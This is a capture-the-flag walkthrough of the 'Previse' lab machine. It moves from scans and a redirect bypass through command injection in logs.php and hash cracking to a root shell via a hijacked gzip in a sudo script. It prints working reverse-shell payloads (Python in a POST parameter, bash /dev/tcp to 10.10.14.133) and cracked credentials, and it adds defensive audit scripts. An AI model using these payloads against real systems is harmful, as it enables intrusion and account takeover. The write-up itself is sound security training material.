$ nmap -p- -T4 -A 10.129.115.17
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
| 256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_ 256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Previse Login
|_Requested resource was login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
$ dirb http://10.129.154.72
---- Scanning URL: http://10.129.154.72/ ----
==> DIRECTORY: http://10.129.154.72/css/
+ http://10.129.154.72/favicon.ico (CODE:200|SIZE:15406)
+ http://10.129.154.72/index.php (CODE:302|SIZE:2801)
==> DIRECTORY: http://10.129.154.72/js/
+ http://10.129.154.72/server-status (CODE:403|SIZE:278)
---- Entering directory: http://10.129.154.72/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.129.154.72/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
$ nikto -h 10.129.154.72
+ Server: Apache/2.4.29 (Ubuntu)
+ Cookie PHPSESSID created without the httponly flag
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: login.php
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 7915 requests: 0 error(s) and 10 item(s) reported on remote host
$ ffuf -u http://10.129.154.72/FUZZ -w /usr/share/wordlists/dirb/big.txt -t 200 -c
.htaccess [Status: 403, Size: 278, Words: 20, Lines: 10]
.htpasswd [Status: 403, Size: 278, Words: 20, Lines: 10]
css [Status: 301, Size: 312, Words: 20, Lines: 10]
favicon.ico [Status: 200, Size: 15406, Words: 15, Lines: 10]
js [Status: 301, Size: 311, Words: 20, Lines: 10]
server-status [Status: 403, Size: 278, Words: 20, Lines: 10]
$ gobuster dir -u http://previse.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html
/index.php (Status: 302) [Size: 2801] [--> login.php]
/download.php (Status: 302) [Size: 0] [--> login.php]
/login.php (Status: 200) [Size: 2224]
/files.php (Status: 302) [Size: 4914] [--> login.php]
/header.php (Status: 200) [Size: 980]
/nav.php (Status: 200) [Size: 1248]
/footer.php (Status: 200) [Size: 217]
/css (Status: 301) [Size: 308] [--> http://previse.htb/css/]
/status.php (Status: 302) [Size: 2966] [--> login.php]
/js (Status: 301) [Size: 307] [--> http://previse.htb/js/]
/logout.php (Status: 302) [Size: 0] [--> login.php]
/accounts.php (Status: 302) [Size: 3994] [--> login.php]
/config.php (Status: 200) [Size: 0]
/logs.php (Status: 302) [Size: 0] [--> login.php]
/server-status (Status: 403) [Size: 276]
http://previse.htb/nav.php
How to bypass the website redirect with Burp Suite
1. Burp -> Proxy -> Open Browser
http://previse.htb/nav.php -> CREATE ACCOUNT
Burp -> HTTP History -> Response: HTTP/1.1 302 Found
The page body is sent along with the 302, so rewriting the captured 30X status line to 200 OK makes the browser render it and bypasses the redirection.
In Burp Suite navigate to:
Proxy -> Options -> Intercept Server Responses -> check "Intercept responses based on the following rules"
Now scroll down to the "Match and Replace" section and add a new rule.
Fill in the blanks:
- Type: Response header
- Match: 30[12] Found  <-- this matches either 301 or 302
- Replace: 200 OK
- Comment: Blockchainer bypass
- Check "Regex match"
Click OK and enable the rule by activating its checkbox.
http://previse.htb/accounts.php
Create a new user account: "Success! User was added!"
Log in at http://previse.htb/index.php with the created user/password.
Go to http://previse.htb/files.php and download the file siteBackup.zip.
kali@kali:~/0.htb/release_arena/Previse/siteBackup$ cat config.php
<?php
function connectDB(){
    $host = 'localhost';
    $user = 'root';
    $passwd = 'mySQL_p@ssw0rd!:)';
    $db = 'previse';
    $mycon = new mysqli($host, $user, $passwd, $db);
    return $mycon;
}
?>
2. Change the response from a 302 to a 200 to access the accounts page.
Burp Suite: http://previse.htb/nav.php
On GET /accounts.php HTTP/1.1
right-click and select Do intercept -> Response to this request,
then change HTTP/1.1 302 Found -> HTTP/1.1 200 Found
Click Forward and create an account on http://previse.htb/accounts.php.
Log in at http://previse.htb/index.php and download the file SITEBACKUP.ZIP.
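Why the status-line rewrite above works: the protected pages send a 302 with Location: login.php but still emit their full HTML, which means the PHP calls header() without an exit afterwards, and the gobuster listing already gives it away (a 302 with Size: 3994 on /accounts.php, against Size: 0 on /logout.php). The Python script below is an added example, not part of the original writeup: it parses gobuster-style lines (the scan output above, embedded as constructed input) and flags every 3xx whose body is larger than Apache's stock redirect document, which is the check to run against your own application to find handlers that need an exit after the redirect header. The 1024-byte threshold is an assumption chosen to sit above the roughly 300-byte Apache 301 bodies seen for /css and /js.

```python
import re

# gobuster "dir" output lines copied from the scan above (constructed sample input)
GOBUSTER_OUTPUT = """\
/index.php (Status: 302) [Size: 2801] [--> login.php]
/download.php (Status: 302) [Size: 0] [--> login.php]
/login.php (Status: 200) [Size: 2224]
/files.php (Status: 302) [Size: 4914] [--> login.php]
/header.php (Status: 200) [Size: 980]
/nav.php (Status: 200) [Size: 1248]
/footer.php (Status: 200) [Size: 217]
/css (Status: 301) [Size: 308] [--> http://previse.htb/css/]
/status.php (Status: 302) [Size: 2966] [--> login.php]
/js (Status: 301) [Size: 307] [--> http://previse.htb/js/]
/logout.php (Status: 302) [Size: 0] [--> login.php]
/accounts.php (Status: 302) [Size: 3994] [--> login.php]
/config.php (Status: 200) [Size: 0]
/logs.php (Status: 302) [Size: 0] [--> login.php]
/server-status (Status: 403) [Size: 276]
"""

LINE_RE = re.compile(
    r"^(?P<path>\S+)\s+\(Status:\s*(?P<status>\d{3})\)\s+\[Size:\s*(?P<size>\d+)\]"
    r"(?:\s+\[-->\s*(?P<target>\S+)\])?"
)

# Apache's own 301/302 error document is a few hundred bytes; anything well
# beyond that on a redirect means the application rendered real content.
# The exact cut-off is an assumption for this example.
STOCK_REDIRECT_BODY_MAX = 1024


def parse_gobuster(text):
    """Turn gobuster lines into dicts; lines that do not match are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        rows.append({
            "path": m.group("path"),
            "status": int(m.group("status")),
            "size": int(m.group("size")),
            "target": m.group("target"),
        })
    return rows


def leaky_redirects(rows, body_max=STOCK_REDIRECT_BODY_MAX):
    """Return paths whose 3xx response carries a body larger than body_max."""
    return [
        r["path"]
        for r in rows
        if 300 <= r["status"] < 400 and r["size"] > body_max
    ]


if __name__ == "__main__":
    for path in leaky_redirects(parse_gobuster(GOBUSTER_OUTPUT)):
        print(f"{path}: redirect with a rendered body, check for a missing exit() after header()")
```

On the scan above this reports /index.php, /files.php, /status.php and /accounts.php; the fix on the server side is the same for each of them, an exit (or die) immediately after the header('Location: ...') call.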
logs.php
/////////////////////////////////////////////////////////////////////////////////////
//I tried really hard to parse the log delims in PHP, but python was SO MUCH EASIER//
/////////////////////////////////////////////////////////////////////////////////////
$output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");
echo $output;
The POST parameter delim is interpolated into the exec() command line without any validation or escaping, so logs.php is vulnerable to OS command injection.
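A quick way to catch this class of bug in a code review is to look for shell sinks whose argument interpolates a request superglobal. The Python checker below is an added example, not the project's code: it scans PHP source for exec(), shell_exec(), system(), passthru(), popen() and proc_open() calls with $_POST, $_GET, $_REQUEST or $_COOKIE inside the argument, and runs over the logs.php fragment above (embedded as sample input) and over a hardened rewrite of the same line (my own, assumed: allowlist the three delimiter names that log_process.py understands and pass the value through escapeshellarg()). The regexes are a line-level heuristic, not a PHP parser.

```python
import re

# Fragment of logs.php from the site backup, embedded here as the sample input.
LOGS_PHP = """\
/////////////////////////////////////////////////////////////////////////////////////
//I tried really hard to parse the log delims in PHP, but python was SO MUCH EASIER//
/////////////////////////////////////////////////////////////////////////////////////
$output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");
echo $output;
"""

# Constructed hardened version of the same code (assumed fix, not from the box):
# the value is allowlisted and still escaped before it reaches the shell.
SAFE_PHP = """\
$allowed = ['space', 'tab', 'comma'];
$delim = in_array($_POST['delim'], $allowed, true) ? $_POST['delim'] : 'comma';
$output = exec("/usr/bin/python /opt/scripts/log_process.py " . escapeshellarg($delim));
echo $output;
"""

SINKS = ("exec", "shell_exec", "system", "passthru", "popen", "proc_open")
SINK_RE = re.compile(r"\b(?P<sink>" + "|".join(SINKS) + r")\s*\((?P<arg>.*)\)\s*;")
SOURCE_RE = re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\s*\[[^\]]*\]")
ESCAPERS = ("escapeshellarg(", "escapeshellcmd(")


def find_shell_injection(php_source):
    """Flag lines where a shell sink's argument directly contains a request superglobal.

    Heuristic: the superglobal counts as escaped only when it sits directly inside
    escapeshellarg()/escapeshellcmd(); interpolation into a double-quoted string
    ("... {$_POST['x']}") or plain concatenation is reported.
    """
    findings = []
    for lineno, line in enumerate(php_source.splitlines(), start=1):
        m = SINK_RE.search(line)
        if not m:
            continue
        arg = m.group("arg")
        for src in SOURCE_RE.finditer(arg):
            before = arg[:src.start()].rstrip()
            if before.endswith(ESCAPERS):
                continue
            findings.append({"line": lineno, "sink": m.group("sink"), "source": src.group(0)})
    return findings


if __name__ == "__main__":
    for f in find_shell_injection(LOGS_PHP):
        print(f"line {f['line']}: {f['source']} reaches {f['sink']}() unescaped")
    print("hardened fragment findings:", find_shell_injection(SAFE_PHP))
```

Note that the allowlist alone would already be enough here, since log_process.py only distinguishes 'space', 'tab' and anything else; escapeshellarg() is kept so the code stays safe if someone later widens the allowlist.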
$ rlwrap -cAr nc -lnvp 4444
Log in as the new user and go to the Management menu > Logs. Capture the request in Burp and add a python reverse shell to the delim parameter.
delim=comma;python3+-c+'import+os,pty,socket%3bs%3dsocket.socket()%3bs.connect(("10.10.14.133",4444))%3b[os.dup2(s.fileno(),f)for+f+in(0,1,2)]%3bpty.spawn("/bin/bash")'
kali@kali:~/0.htb/release_arena/Previse$ rlwrap -cAr nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.133] from (UNKNOWN) [10.129.158.226] 48430
www-data@previse:/var/www/html$
mysql -u root -p
mySQL_p@ssw0rd!:)
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 15
Server version: 5.7.35-0ubuntu0.18.04.1 (Ubuntu)
Copyright (c) 2000, 2021, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| previse |
| sys |
+--------------------+
5 rows in set (0.00 sec)
use previse;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
show tables;
+-------------------+
| Tables_in_previse |
+-------------------+
| accounts |
| files |
+-------------------+
2 rows in set (0.00 sec)
select * from accounts;
+----+-----------+------------------------------------+---------------------+
| id | username | password | created_at |
+----+-----------+------------------------------------+---------------------+
| 1 | m4lwhere | $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. | 2021-05-27 18:18:36 |
| 2 | cptadmin | $1$🧂llol$79cV9c1FNnnr7LcfPFlqQ0 | 2021-08-09 22:17:53 |
| 3 | cticadmin | $1$🧂llol$79cV9c1FNnnr7LcfPFlqQ0 | 2021-08-10 21:41:22 |
+----+-----------+------------------------------------+---------------------+
3 rows in set (0.00 sec)
drwxr-xr-x 5 m4lwhere m4lwhere 4096 Jul 28 09:10 m4lwhere
www-data@previse:/home$
$ hashcat -a 0 -m 500 malware.txt /usr/share/wordlists/rockyou.txt --show
$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.:ilovecody112235!
kali@kali:~/0.htb/release_arena/Previse$ john -format=md5crypt-long --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt-long, crypt(3) $1$ (and variants) [MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ilovecody112235! (?)
1g 0:00:04:22 DONE (2021-08-08 19:55) 0.003815g/s 28288p/s 28288c/s 28288C/s ilovecodydean..ilovecody..
Use the "--show" option to display all of the cracked passwords reliably
Session completed
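Before anything is cracked, the dump itself tells a defender three things: every hash is $1$ md5crypt (the -m 500 mode above, a fast legacy scheme), all three rows carry the same salt 🧂llol, so the application hard-codes its salt, and cptadmin and cticadmin have byte-identical hashes, which with a fixed salt means identical passwords. The Python script below is an added example, not part of the writeup: it parses the MySQL table output above (embedded as a constructed copy) and reports weak schemes, shared salts and duplicate hashes. The scheme table covers the common crypt(3) prefixes; anything unrecognised is reported as unknown and treated as weak.

```python
from collections import defaultdict

# The accounts table as dumped from the MySQL shell above (constructed copy of that output).
ACCOUNTS_DUMP = """\
+----+-----------+------------------------------------+---------------------+
| id | username  | password                           | created_at          |
+----+-----------+------------------------------------+---------------------+
|  1 | m4lwhere  | $1$🧂llol$DQpmdvnb7EeuO6UaqRItf.   | 2021-05-27 18:18:36 |
|  2 | cptadmin  | $1$🧂llol$79cV9c1FNnnr7LcfPFlqQ0   | 2021-08-09 22:17:53 |
|  3 | cticadmin | $1$🧂llol$79cV9c1FNnnr7LcfPFlqQ0   | 2021-08-10 21:41:22 |
+----+-----------+------------------------------------+---------------------+
"""

# Modular crypt format prefixes -> (scheme name, considered weak today?)
SCHEMES = {
    "$1$": ("md5crypt", True),        # MD5-based, 1000 rounds; hashcat -m 500
    "$5$": ("sha256crypt", False),
    "$6$": ("sha512crypt", False),
    "$2y$": ("bcrypt", False),
    "$2b$": ("bcrypt", False),
    "$argon2id$": ("argon2id", False),
}


def parse_mysql_table(text):
    """Parse the ASCII table the mysql client prints into a list of row dicts."""
    rows = []
    for line in text.splitlines():
        if not line.startswith("|"):
            continue                      # +----+ separator lines
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if cells[0] == "id":
            continue                      # header row
        rows.append({"id": int(cells[0]), "username": cells[1],
                     "password": cells[2], "created_at": cells[3]})
    return rows


def classify_hash(h):
    """Return (scheme, weak) from the hash prefix."""
    for prefix, (name, weak) in SCHEMES.items():
        if h.startswith(prefix):
            return name, weak
    return "unknown", True


def salt_of(h):
    """Salt field of a $id$salt$hash string (bcrypt packs cost+salt differently)."""
    parts = h.split("$")
    return parts[2] if len(parts) >= 4 else ""


def audit_accounts(rows):
    """Report weak schemes, salts shared across accounts, and identical hashes."""
    report = {"weak_scheme": [], "shared_salt": [], "duplicate_hash": []}
    by_salt = defaultdict(list)
    by_hash = defaultdict(list)
    for r in rows:
        name, weak = classify_hash(r["password"])
        if weak:
            report["weak_scheme"].append((r["username"], name))
        by_salt[salt_of(r["password"])].append(r["username"])
        by_hash[r["password"]].append(r["username"])
    report["shared_salt"] = [u for u in by_salt.values() if len(u) > 1]
    report["duplicate_hash"] = [u for u in by_hash.values() if len(u) > 1]
    return report


if __name__ == "__main__":
    for key, value in audit_accounts(parse_mysql_table(ACCOUNTS_DUMP)).items():
        print(f"{key}: {value}")
```

A shared salt is the finding to act on first: it turns every account into the same rainbow-table problem and leaks password equality between users, regardless of which hash scheme sits behind it.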
kali@kali:~/0.htb/release_arena/Previse$ ssh m4lwhere@previse.htb
m4lwhere@previse.htb's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-151-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun Aug 8 17:18:20 UTC 2021
System load: 0.0 Processes: 171
Usage of /: 52.4% of 4.85GB Users logged in: 0
Memory usage: 32% IP address for eth0: 10.129.154.72
Swap usage: 0%
0 updates can be applied immediately.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri Jun 18 01:09:10 2021 from 10.10.10.5
m4lwhere@previse:~$
m4lwhere@previse:~$ cat user.txt
b3125ede488b9939857fe5283563cfb5
m4lwhere@previse:~$
m4lwhere@previse:~$ sudo -l
[sudo] password for m4lwhere:
User m4lwhere may run the following commands on previse:
(root) /opt/scripts/access_backup.sh
m4lwhere@previse:~$
m4lwhere@previse:~$ cat /opt/scripts/access_backup.sh
#!/bin/bash
# We always make sure to store logs, we take security SERIOUSLY here
# I know I shouldnt run this as root but I cant figure it out programmatically on my account
# This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time
gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz
gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gz
m4lwhere@previse:~$
m4lwhere@previse:/opt/scripts$ cat log_process.py
import pandas as pd
from sys import argv

# The delimiter is chosen from an allowlist: anything other than 'space' or 'tab'
# falls back to a comma. The injection happens earlier, in logs.php, where the raw
# POST value is spliced into the exec() command line before this script sees argv[1].
if argv[1] == 'space':
    delims = ' '
elif argv[1] == 'tab':
    delims = '\t'
else:
    delims = ','

df = pd.read_csv('/var/www/file_access.log',
                 index_col='time',
                 names=['time', 'user', 'fileID'])
df.to_csv('/var/www/out.log', sep=delims)
m4lwhere@previse:/opt/scripts$
kali@kali:~/0.htb/release_arena/Previse$ nc -lvnp 5555
listening on [any] 5555 ...
m4lwhere@previse:/tmp$ vi gzip
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.133/5555 0>&1
m4lwhere@previse:/tmp$ export PATH=$(pwd):$PATH
m4lwhere@previse:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/u
m4lwhere@previse:/tmp$ chmod +x gzip
m4lwhere@previse:/tmp$ sudo /opt/scripts/access_backup.sh
kali@kali:~/0.htb/release_arena/Previse$ nc -lvnp 6666
listening on [any] 6666 ...
connect to [10.10.14.133] from (UNKNOWN) [10.129.154.72] 50678
root@previse:/tmp#
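The root escalation works because access_backup.sh runs as root through sudo but calls gzip and date by bare name, so they resolve through the caller's PATH whenever sudo does not enforce a secure_path. The Python audit below is an added example, not part of the box or the writeup: it lists the unqualified external commands in a shell script (including those inside $( ... ) substitutions) and reports whether the script pins PATH, run over the backup script above (embedded as a constructed copy) and over a hardened rewrite (my own, assumed) that sets PATH, uses absolute binary paths and quotes its filenames. Fixing the sudoers side with Defaults secure_path and env_reset closes the same hole for every rule at once. The builtin list is a small heuristic, not a complete bash grammar.

```python
import re

# /opt/scripts/access_backup.sh as shown above (constructed copy of that listing).
BACKUP_SH = """\
#!/bin/bash
# We always make sure to store logs, we take security SERIOUSLY here
gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz
gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gz
"""

# Assumed hardened version (not from the box): PATH pinned, every binary absolute,
# filenames quoted, and the script aborts on the first failure.
HARDENED_SH = """\
#!/bin/bash
set -euo pipefail
PATH=/usr/sbin:/usr/bin:/sbin:/bin
STAMP=$(/bin/date --date="yesterday" +%Y%b%d)
/bin/gzip -c /var/log/apache2/access.log > "/var/backups/${STAMP}_access.gz"
/bin/gzip -c /var/www/file_access.log > "/var/backups/${STAMP}_file_access.gz"
"""

# Words that never resolve through PATH; a small subset, enough for backup-style scripts.
SHELL_BUILTINS = {"set", "export", "cd", "exit", "if", "then", "else", "fi",
                  "for", "do", "done", "while", "umask", "trap"}
ASSIGNMENT_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")
SUBST_RE = re.compile(r"\$\(([^)]*)\)")


def command_words(script):
    """Yield (lineno, word) for the first word of every simple command,
    including commands inside $( ... ) and after |, ||, && and ;."""
    for lineno, raw in enumerate(script.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # Commands inside substitutions first, then the line with them removed.
        segments = SUBST_RE.findall(line) + [SUBST_RE.sub("", line)]
        for seg in segments:
            for piece in re.split(r"\|\||&&|[|;]", seg):
                tokens = piece.strip().split()
                # Skip leading VAR=value assignments (PATH=..., STAMP=...).
                while tokens and ASSIGNMENT_RE.match(tokens[0]):
                    tokens.pop(0)
                if tokens:
                    yield lineno, tokens[0]


def audit_script(script):
    """Return the commands resolved via PATH and whether PATH is set explicitly."""
    pinned = any(re.match(r"^\s*(export\s+)?PATH=", l) for l in script.splitlines())
    unqualified = []
    for lineno, word in command_words(script):
        if word in SHELL_BUILTINS or word.startswith(("/", "./")):
            continue
        unqualified.append((lineno, word))
    return {"path_pinned": pinned, "unqualified": unqualified}


if __name__ == "__main__":
    for label, src in (("access_backup.sh", BACKUP_SH), ("hardened", HARDENED_SH)):
        rep = audit_script(src)
        print(f"{label}: PATH pinned={rep['path_pinned']}, "
              f"PATH-resolved commands={rep['unqualified']}")
```

Both gzip and date are reported for the original script; the hijack above replaces gzip, but date inside the $( ... ) would have served just as well, which is why the audit looks inside substitutions.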
root@previse:/root# cat root.txt
79ba66232e2d29b3d2757396fc565491
root@previse:/root#